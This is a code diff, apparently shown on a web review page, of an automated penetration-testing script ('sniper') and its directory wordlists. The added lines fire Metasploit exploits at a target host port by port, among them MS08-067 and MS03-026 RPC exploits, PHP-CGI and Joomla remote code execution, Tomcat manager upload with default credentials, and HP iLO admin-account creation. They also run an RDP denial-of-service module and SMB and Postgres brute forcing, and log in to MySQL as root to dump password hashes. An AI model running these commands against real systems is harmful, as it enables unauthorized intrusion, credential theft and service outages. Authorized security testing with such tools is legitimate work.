echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET"
|
||||
msfconsole -q -x "use auxiliary/scanner/nfs/nfsmount; setg RHOSTS \"$TARGET\"; run; back;exit;"
|
||||
showmount -a $TARGET
|
||||
showmount -d $TARGET
|
||||
showmount -e $TARGET
|
||||
|
|
@ -1837,6 +2173,17 @@ else
|
|||
echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
|
||||
rpcinfo -p $TARGET
|
||||
nmap -A -p 135 -T5 --script=rpc* $TARGET
|
||||
msfconsole -x "use exploit/windows/dcerpc/ms03_026_dcom; setg RHOST \"$TARGET\"; run; back; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_137" ];
|
||||
then
|
||||
echo -e "$OKRED + -- --=[Port 137 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 137 opened... running tests...$RESET"
|
||||
rpcinfo -p $TARGET
|
||||
nmap -A -p 137 -T5 --script=broadcast-netbios-master-browser* $TARGET
|
||||
msfconsole -q -x "use auxiliary/scanner/netbios/nbname; setg RHOSTS $TARGET; run; back;exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_139" ];
|
||||
|
|
@ -1852,7 +2199,7 @@ else
|
|||
python $SAMRDUMP $TARGET
|
||||
nbtscan $TARGET
|
||||
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
|
||||
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_161" ];
|
||||
|
|
@ -1905,15 +2252,14 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
|
||||
sslscan --no-failed $TARGET
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
|
|
@ -1927,10 +2273,16 @@ else
|
|||
|
||||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_TOPLIST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
|
|
@ -1942,6 +2294,10 @@ else
|
|||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1955,11 +2311,86 @@ else
|
|||
echo ""
|
||||
python $CMSMAP -t https://$TARGET/wordpress/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -2033,7 +2464,14 @@ else
|
|||
python $SAMRDUMP $TARGET
|
||||
nbtscan $TARGET
|
||||
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/smb/smb_version; run; use auxiliary/scanner/smb/pipe_auditor; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use exploit/windows/smb/ms06_040_netapi; run; use exploit/windows/smb/ms05_039_pnp; run; use exploit/windows/smb/ms10_061_spoolss; run; use exploit/windows/smb/ms09_050_smb2_negotiate_func_index; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_512" ];
|
||||
|
|
@ -2123,6 +2561,7 @@ then
|
|||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
|
||||
nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/mssql/mssql_ping; setg RHOSTS \"$TARGET\"; run; back; exit;"
|
||||
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
|
||||
fi
|
||||
|
||||
|
|
@ -2148,6 +2587,7 @@ then
|
|||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
|
||||
nmap -A -sV -Pn -T5 --script=rdp-* -p 3389 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/rdp/ms12_020_check; setg RHOSTS \"$TARGET\"; run; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids; run; back; exit;"
|
||||
rdesktop $TARGET &
|
||||
fi
|
||||
|
||||
|
|
@ -2171,7 +2611,9 @@ else
|
|||
echo ""
|
||||
sslscan --no-failed $TARGET:4443
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
|
||||
nikto -h https://$TARGET:4443 -output $LOOT_DIR/web/nikto-$TARGET-https-4443.txt
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
nikto -h https://$TARGET:4443 -output $LOOT_DIR/web/nikto-$TARGET-https-4443.txt
|
||||
fi
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg --insecure --max-wait=1000 2> /dev/null
|
||||
else
|
||||
|
|
@ -2186,6 +2628,7 @@ then
|
|||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
|
||||
nmap -A -sV -Pn --script=pgsql-brute -p 5432 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/postgres/postgres_login; setg RHOSTS "$TARGET"; run; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_5800" ];
|
||||
|
|
@ -2202,6 +2645,7 @@ then
|
|||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
|
||||
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; setg RHOSTS \"$TARGET\"; run; back; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_5984" ];
|
||||
|
|
@ -2293,8 +2737,28 @@ else
|
|||
else
|
||||
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg --insecure --max-wait=1000 2> /dev/null
|
||||
fi
|
||||
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
|
||||
msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS CVE-2017-5638 VULN SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST PLUGIN XSTREAM RCE VULN CHECK $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKBLUE}[*] If you see a 200 response code below, try running 'msfconsole -x \"multi/http/struts2_rest_xstream; set RHOST \"$TARGET\"; exploit -j; exit;"
|
||||
curl -I http://$TARGET:8080/struts2-rest-showcase/orders/3 -s | grep HTTP | grep 200
|
||||
curl -I http://$TARGET:8080/struts2-showcase/integration/saveGangster.action -s | grep HTTP | grep 200
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA RCE VULN CHECK $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "${OKBLUE}[*] If you see a 200 response code below, try running 'msfconsole -x \"multi/http/struts2_content_type_ognl; set RHOST \"$TARGET\"; exploit -j; exit;"
|
||||
curl -I http://$TARGET:8080/struts2-showcase/ -s | grep HTTP | grep 200
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use admin/http/jboss_bshdeployer; run; use auxiliary/scanner/http/jboss_status; run; use admin/http/tomcat_administration; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WILDFLY TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wildfly_traversal; setg RHOSTS "$TARGET"; set RPORT 8080; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -2402,6 +2866,7 @@ else
|
|||
echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
|
||||
amap $TARGET 16992 -A
|
||||
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
|
||||
msfconsole -x "use auxiliary/scanner/http/intel_amt_digest_bypass; setg RHOSTS \"$TARGET\"; run; back; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_27017" ];
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo ""
|
||||
|
||||
INSTALL_DIR=/usr/share/sniper
|
||||
|
|
|
|||
|
|
@ -1,4 +1,5 @@
|
|||
|
||||
uddiexplorer
|
||||
+CSCOE+/logon.html
|
||||
_
|
||||
__
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
|
|
@ -1,3 +1,5 @@
|
|||
|
||||
uddiexplorer
|
||||
a2e2gp2r2x.jsp
|
||||
+CSCOE+/logon.html
|
||||
.access
|
||||
|
|
|
|||
|
|
@ -1,3 +1,5 @@
|
|||
|
||||
uddiexplorer
|
||||
_
|
||||
+CSCOE+/logon.html
|
||||
@
|
||||
|
|
|
|||
Loading…
Reference in New Issue